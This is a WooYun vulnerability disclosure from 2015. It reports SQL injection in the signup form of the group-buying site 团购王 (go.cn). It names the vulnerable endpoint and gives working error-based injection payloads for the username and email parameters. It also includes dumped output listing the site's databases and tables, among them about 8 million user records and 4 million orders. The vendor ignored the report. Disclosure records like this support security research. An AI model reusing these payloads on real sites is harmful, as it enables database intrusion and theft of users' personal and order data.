当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118379

漏洞标题:团购王主站SQL注射800万用户&400万订单信息

相关厂商:团购王

漏洞作者: 路人甲

提交时间:2015-06-05 10:53

修复时间:2015-06-10 10:54

公开时间:2015-06-10 10:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-05: 细节已通知厂商并且等待厂商处理中
2015-06-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

233

详细说明:

注册的地方
http://www.go.cn:80/index.php?m=signup (POST)
commit=%e5%90%8c%e6%84%8f%e5%b9%b6%e6%b3%a8%e5%86%8c&cityid_city=beijing&do=insert&email=ag&password=wyd&password2=wyD&province=%e5%8c%97%e4%ba%ac&subscribe=1&username=wooyun&yanzhengma=1

漏洞证明:

g20150605101900.png


g20150605102023.png


---
Parameter: username (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: commit=%e5%90%8c%e6%84%8f%e5%b9%b6%e6%b3%a8%e5%86%8c&cityid_city=San Francisco&do=insert&email=ag&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&province=%e5%8c%97%e4%ba%ac&subscribe=1&username=agvtjtdb' AND (SELECT 6431 FROM(SELECT COUNT(*),CONCAT(0x7171707171,(SELECT (ELT(6431=6431,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RTTd'='RTTd&yanzhengma=1
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Parameter: email (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: commit=%e5%90%8c%e6%84%8f%e5%b9%b6%e6%b3%a8%e5%86%8c&cityid_city=San Francisco&do=insert&email=ag' AND (SELECT 8651 FROM(SELECT COUNT(*),CONCAT(0x7171707171,(SELECT (ELT(8651=8651,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'krPi'='krPi&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&province=%e5%8c%97%e4%ba%ac&subscribe=1&username=agvtjtdb&yanzhengma=1
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
back-end DBMS: MySQL 5.0
available databases [10]:
[*] baiduzy
[*] go
[*] go.cn
[*] gocnappapi
[*] gocnopen
[*] mysql
[*] nuomi
[*] percona
[*] performance_schema
[*] test
Database: go.cn
+-------------------------------------------+---------+
| Table                                     | Entries |
+-------------------------------------------+---------+
| jiuder_source_address_history             | 31943364 |
| jiuder_user                               | 8062578 |
| jiuder_adminlog                           | 6192775 |
| jiuder_KeywordSearchInfo                  | 5645317 |
| jiuder_smslog_20130817                    | 4231301 |
| jiuder_order                              | 4174809 |
| jiuder_subway_station_group_relation      | 2776647 |
| jiuder_maillog                            | 2422258 |
| jiuder_useraddress                        | 2366783 |
| jiuder_network                            | 2275597 |
| jiuder_usercoupons                        | 1639313 |
| jiuder_access_info                        | 1512328 |
| jiuder_creditlog                          | 1487229 |
| jiuder_brand_click                        | 1152692 |
| jiuder_supplier_tuikuan_flow_log          | 1065049 |
| jiuder_group                              | 1043867 |
| jiuder_baidu_type_group                   | 1043861 |
| jiuder_group_relation_changecate2         | 1040469 |
| jiuder_group_relation_changecate          | 1039236 |
| jiuder_supplier_lalotude                  | 1032639 |
| jiuder_group_information                  | 1024431 |
| jiuder_360_type_group                     | 1004924 |
| jiuder_operation_history                  | 940136  |
| jiuder_othersites_relation_group          | 854442  |
| jiuder_area_business_group_relation       | 850113  |
| jiuder_water_table_set                    | 740059  |
| jiuder_groupcoupons                       | 736374  |
| jiuder_orderlog                           | 730253  |
| jiuder_invalid_order                      | 695579  |
| jiuder_lottery                            | 675531  |
| jiuder_baidurecord                        | 475263  |
| jiuder_asyncode_order                     | 475153  |
| ip_address                                | 403719  |
| jiuder_smslog                             | 399792  |
| jiuder_source                             | 377672  |
| jiuder_user_subjoin                       | 346186  |
| jiuder_call_log                           | 340588  |
| jiuder_supplier_schedule                  | 331731  |
| jiuder_supplier_tuikuan_yunfei            | 318747  |
| jiuder_group_property_value               | 303649  |
| jiuder_error_log                          | 274149  |
| jiuder_order_return_log                   | 216548  |
| jiuder_supplier_tuikuan_flow_log_history  | 209341  |
| jiuder_asyncode_order_history             | 207810  |
| jiuder_supplier_tuikuan_flow_info         | 206542  |
| jiuder_supplier_tuikuan                   | 198427  |
| jiuder_total_salenum_table                | 195616  |
| jiuder_group_relation_type                | 157447  |
| jiuder_click_demand                       | 127518  |
| jiuder_consult                            | 121296  |
| jiuder_group_property_relation            | 120071  |
| jiuder_group_top_gid                      | 108376  |
| jiuder_order_return                       | 104903  |
| jiuder_api_visits                         | 104008  |
| jiuder_complaints                         | 103539  |
| jiuder_othersites_relation_user           | 98315   |
| jiuder_group_oneday_statistics            | 97446   |
| jiuder_totalorder                         | 89057   |
| jiuder_chargecard                         | 84374   |
| jiuder_KeywordSearchHistory               | 84318   |
| jiuder_feedback                           | 82449   |
| jiuder_ctrip_usetime_change               | 75469   |
| jiuder_supplier_tuikuan_flow_info_history | 74400   |
| jiuder_othersites_relation_order          | 67580   |
| jiuder_group_property_name                | 67258   |
| jiuder_waplog                             | 58926   |
| jiuder_luckgame_log                       | 54031   |
| jiuder_source_address                     | 52825   |
| jiuder_voucher_order_act                  | 51440   |
| jiuder_daily_statistic                    | 51089   |
| jiuder_projects                           | 41561   |
| jiuder_invite                             | 37080   |
| jiuder_modify_mobilebind                  | 33033   |
| jiuder_holiday                            | 28506   |
| jiuder_area_and_business                  | 25055   |
| jiuder_supplier                           | 22215   |
| jiuder_change_api_gid                     | 21420   |
| jiuder_group_api_line                     | 21329   |
| egg_record                                | 17002   |
| jiuder_maillist                           | 13297   |
| jiuder_supplier_tuikuan_account           | 12600   |
| jiuder_masses_comments                    | 11658   |
| jiuder_set_jinshan_api                    | 11650   |
| tmp                                       | 10000   |
.......................

修复方案:

~~~~~~~~~~~~~请别放弃治疗。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-10 10:54

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无